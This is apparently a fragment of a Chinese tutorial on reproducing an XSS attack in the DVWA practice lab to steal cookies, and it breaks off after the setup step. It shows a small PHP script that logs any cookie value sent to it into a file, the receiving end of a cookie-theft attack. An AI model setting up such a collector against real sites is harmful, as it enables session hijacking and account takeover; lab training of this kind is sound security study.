漏洞復現篇——利用XSS漏洞獲取cookie

實驗環境: PHPstudy 火狐瀏覽器、IE DVWA靶場 實驗準備: 在www目錄下建立一個名爲1.php的文件,內容以下:php <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 模擬實驗: 一、把級別調成low
相關文章
相關標籤/搜索